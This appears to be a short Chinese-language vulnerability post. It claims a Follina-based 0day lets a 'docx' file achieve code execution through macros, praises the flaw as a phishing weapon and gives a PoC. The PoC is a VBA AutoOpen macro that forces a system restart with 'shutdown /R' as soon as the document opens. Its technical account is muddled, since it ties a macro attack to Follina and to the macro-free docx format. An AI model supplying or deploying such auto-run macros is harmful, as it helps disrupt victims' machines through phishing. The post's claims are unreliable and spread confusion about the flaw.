漏洞简述

问题仍出在 "docx "文件上，该漏洞基于 Follina 的0day漏洞,依然是利用的宏脚本实现的RCE操作。视频演示中，可以看到：用户如何被诱骗打开攻击者发送给他们的恶意文件，执行该文件后，对在执行该文件的“受害者”来说，情况将非常糟糕（视频演示为“强制用户的 Windows 操作系统关闭”）

可以说利用该漏洞进行“钓鱼”攻击，将是一大利器！

PoC

Sub AutoOpen()
Dim Program As String
Dim TaskID As Double
On Error Resume Next
Program = "shutdown /R"
TaskID = Shell(Program, 1)
If Err <> 0 Then
MsgBox "Can't start " & Program
End If
End Sub